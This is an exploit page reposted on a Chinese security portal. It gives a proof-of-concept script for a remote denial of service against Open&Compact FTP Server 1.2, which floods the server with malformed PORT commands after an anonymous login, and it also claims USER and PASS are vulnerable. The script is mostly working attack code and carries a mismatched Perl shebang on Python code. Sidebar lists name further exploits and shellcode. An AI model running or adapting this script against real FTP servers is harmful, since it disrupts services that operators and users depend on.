首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Open and Compact FTP server version 1.2 PORT command denial of service exploit
来源:www.sec4ever.com 作者:Ma3sTr0-Dz 发布时间:2010-05-24  
=============================================================================
# Tilte: Open&Compact Ftp Server 1.2 "PORT" command Remote Denial of Service.
=============================================================================

# Date....................: [22-05-2010]# Author..................: [Ma3sTr0-Dz]# Location ...............: [Algeria]# Software ...............: [Open&Comapct Ftp Server 1.2 "PORT" command Remote Denial of Service]# Impact..................: [Remote]# Site Software ..........: 
[http://sourceforge.net/projects/open-ftpd/]# Sptnx ..................: [CmOs_CLR & Sec4ever
 Memberz.]# Home : .................: 
[Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]# Contact me : ...........: [o5m@hotmail.de]  #
 Vulnerability: Remote Denial of service .
   #
 Part ExplOit & Bug Codes :  
---

#!/usr/bin/perl

import socket

print '---------------------------------------------------------------------'
print ' Open&Compact Ftp Server 1.2 "PORT" command Remote Denial of Service'
print ' url: http://sourceforge.net/projects/open-ftpd'
print ' author: Ma3sTr0-Dz'
print ' mail: o5m@hotmail.de'
print ' site: www.sec4ever.com'
print ' USER and PASS methods are vulnerable too, just pass "A: " * 1000'
print ' as buffer'
print '---------------------------------------------------------------------'

buffer = "A" * 5

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1",21))
s.send('USER %s\r\n' % "anonymous")

for i in range(1,31):
   s.send('PORT %s\n\n' % buffer)
   print "Sending request n. " + str(i)

---
Don't Forget : Www.Sec4ever.Com/home [ Class it in favoris for more surprices ]





 		 	   		  
_________________________________________________________________
Votre messagerie et bien plus où que vous soyez. Passez à Windows Live Hotmail, c'est gratuit !
https://signup.live.com/signup.aspx?id=60969



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CompleteFTP Server version 3.3
·Hustoj (fckeditor) remote arbi
·ECShop remote SQL injection ex
·Rumba FTP Client FTPSFtp.dll v
·Firefox 3.6.3 (latest) <= memo
·Solaris/x86 - Reboot() - 37 by
·Solarwinds 10.4.0.10 TFTP DOS
·Solaris/x86 - Halt shellcode -
·Amaya 11.3.1(dec 9 2009) remot
·ComponentOne VSFlexGrid v. 7 &
·WinDirectAudio (.WAV) PoC
·Solaris/x86 - execve("/bin/sh"
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved